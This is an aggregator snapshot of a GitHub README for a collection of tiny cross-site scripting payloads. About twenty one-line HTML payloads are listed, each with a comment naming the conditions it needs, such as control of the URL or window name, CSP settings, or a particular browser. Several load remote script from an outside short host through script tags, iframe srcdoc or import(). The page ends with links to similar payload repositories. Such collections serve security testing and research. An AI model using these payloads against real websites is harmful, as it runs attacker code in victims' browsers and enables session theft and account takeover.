GitHub - terjanq/Tiny-XSS-Payloads: A collection of tiny XSS Payloads that can b...
source link: https://github.com/terjanq/Tiny-XSS-Payloads
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Tiny-XSS-Payloads
A collection of short XSS payloads that can be used in different contexts.
The DEMO available here: https://tinyxss.terjanq.me
Current Payloads
<!-- Only works as reflected XSS --> <svg/onload=eval(name)>
<!-- If you control the URL --> <svg/onload=eval(`'`+URL)>
<!-- If you control the name, but unsafe-eval not enabled --> <svg/onload=location=name>
<!-- In chrome, also works inside innerHTML, even on elements not yet inserted into DOM --> <svg><svg/onload=eval(name)>
<!-- If you control window's name, this payload will work inside innerHTML, even on elements not yet inserted into the DOM --> <audio/src/onerror=eval(name)>
<!-- If you control the URL, this payload will work inside innerHTML, even on elements not yet inserted into the DOM --> <img/src/onerror=eval(`'`+URL)>
<!-- Just a casual script --> <script/src=//NJ.₨></script>
<!-- If you control the name of the window --> <iframe/onload=src=top.name>
<!-- If you control the URL --> <iframe/onload=eval(`'`+URL)>
<!-- If number of iframes on the page is constant --> <iframe/onload=src=top[0].name+/\NJ.₨?/>
<!-- for Firefox only --> <iframe/srcdoc="<svg><script/href=//NJ.₨ />">
<!-- If number of iframes on the page is random --> <iframe/onload=src=contentWindow.name+/\NJ.₨?/>
<!-- If unsafe-inline is disabled in CSP and external scripts allowed --> <iframe/srcdoc="<script/src=//NJ.₨></script>">
<!-- If inline styles are allowed --> <style/onload=eval(name)>
<!-- If inline styles are allowed and the URL can be controlled --> <style/onload=eval(`'`+URL)>
<!-- If inline styles are blocked --> <style/onerror=eval(name)>
<!-- Uses external script as import, doesn't work in innerHTML unless Firefox -->
<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header --> <svg/onload=import(/\\NJ.₨/)>
<!-- Uses external script as import, triggers if inline styles are allowed. <!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header --> <style/onload=import(/\\NJ.₨/)>
<!-- Uses external script as import --> <!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header --> <iframe/onload=import(/\\NJ.₨/)>
Deprecated:
<!-- If you control the URL, Safari-only --> <iframe/onload=write(URL)>
<!-- If inline styles are allowed, Safari only --> <style/onload=write(URL)>
Recommend
-
110
README.md Payloads All The Things A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! I <3 pull requests :) A...
-
76
README.md
-
77
README.md
-
99
README.md Skor skor is a utility for Postgres which calls a webhook with row changes as JSON whenever an INSERT, UPDATE or DELETE event occurs on a particular table. You can drop t...
-
52
README.md
-
38
README.md xss_payloads Payloads for practical exploitation of cross site scripting. Usage Find XSS vuln in your app Get P...
-
21
HopLa All the power of PayloadsAllTheThings, without the overhead. This extension adds autocompletion support and useful payloads in Burp S...
-
9
Files Permalink Latest commit message Commit time
-
8
Files Permalink Latest commit message Commit time
-
8
PackMyPayload - Emerging Threat of Containerized Malware Click for a fast-forward to supported formats This tool takes a file or directory on input an...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK